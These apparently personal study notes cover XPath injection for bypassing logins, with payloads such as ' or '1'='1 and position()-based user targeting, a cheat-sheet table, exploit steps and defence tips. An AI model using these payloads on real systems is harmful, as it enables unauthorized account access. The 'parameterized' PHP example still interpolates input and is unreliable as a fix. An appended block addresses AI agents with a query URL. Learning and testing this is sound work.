# XPath Injection - Authentication Bypass

#### **Key Concepts**

1. **What is XPath?**
   * XPath is a query language for selecting nodes from an XML document.
   * It is often used in web applications for data retrieval and authentication mechanisms.
2. **What is XPath Injection?**
   * An attack technique where an attacker manipulates user input to alter the structure of an XPath query, bypassing authentication or gaining unauthorized access.

***

#### **XPath Query Example**

Consider the following XML user data:

```xml
xmlCopyEdit<users>
  <user>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
  <user>
    <username>admin</username>
    <password>admin</password>
  </user>
</users>
```

Authentication might use the following query:

```xpath
xpathCopyEdit/users/user[username/text()='USERNAME' and password/text()='PASSWORD']
```

If user input is unsanitized, injection becomes possible.

***

#### **Common Payloads**

1. **Universal True (Bypass Authentication)**:

   ```plaintext
   ' or '1'='1
   ```

   Resulting Query:

   ```xpath
   /users/user[username/text()='' or '1'='1' and password/text()='']
   ```
2. **Target a Specific User (Admin)**:

   ```plaintext
   admin' or '1'='1
   ```

   Resulting Query:

   ```xpath
   /users/user[username/text()='admin' or '1'='1' and password/text()='irrelevant']
   ```
3. **Use Position-Based Targeting**:

   ```plaintext
   ' or position()=2 or '
   ```

Change the 2 to an 3 to Pivot to different account

<pre><code><strong>' or position()=3 or '
</strong></code></pre>

1. Resulting Query:

   <pre class="language-xpath"><code class="lang-xpath"><strong>/users/user[username/text()='' or position()=2 or '' and password/text()='irrelevant']
   </strong></code></pre>

   * This targets the second user in the XML file (e.g., `admin`).
2. **Substring Matching**:

   ```plaintext
   ' or contains(.,'admin') or '
   ```

   Resulting Query:

   ```xpath
   /users/user[username/text()='' or contains(.,'admin') or '' and password/text()='irrelevant']
   ```

   * Searches for any user with "admin" in their username or other fields.

***

#### **Steps to Exploit**

1. **Analyze Application Behavior**:
   * Understand how usernames and passwords are processed (e.g., via POST requests, cookies, etc.).
2. **Test for Injection Points**:
   * Inject payloads into the username or password fields to observe server responses.
3. **Craft Payloads**:
   * Use payloads like `position()` or `contains()` to refine your query targeting.
4. **Privilege Escalation**:
   * Use payloads to access specific accounts or enumerate users until the desired privileges are obtained.

***

#### **Practical Exploitation Example**

**Payload to Target Admin (Second User):**

```plaintext
username=' or position()=2 or '&password=irrelevant
```

**Response Example**:

* Successfully logged in as `WELCOME SUPERUSER!`.

***

#### **Defense Measures**

1. **Sanitize Inputs**:
   * Use proper input validation and encoding to prevent injection.
   * Reject special characters like `'`, `"`, `[`, and `]`.
2. **Parameterized Queries**:
   * Avoid dynamically building XPath queries. Use parameterized XPath APIs:

     ```php
     $query = "/users/user[username/text()=$username and password/text()=$password]";
     ```
3. **Hash Passwords**:
   * Ensure passwords are hashed before storage and comparison.
4. **Error Messages**:
   * Avoid detailed error messages that reveal query structures.

***

#### **Key Takeaways**

* XPath Injection is similar to SQL Injection but targets XML queries.
* Functions like `position()` and `contains()` can help refine targeting in complex scenarios.
* Proper sanitization and secure coding practices are essential to mitigate these attacks.

***

#### **Payloads to Remember**

| **Scenario**                       | **Payload**                     | **Result**                            |
| ---------------------------------- | ------------------------------- | ------------------------------------- |
| Bypass Authentication              | `' or '1'='1`                   | Logs in as the first user.            |
| Target Specific User (e.g., Admin) | `admin' or '1'='1`              | Logs in as admin.                     |
| Position-Based User Targeting      | `' or position()=2 or '`        | Logs in as the second user.           |
| Substring Matching (Admin)         | `' or contains(.,'admin') or '` | Finds users with "admin" in username. |


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://itrp19-notes.gitbook.io/notes/reference/hacking/web-app-pentesting/sql-injection/xpath-injection-authentication-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.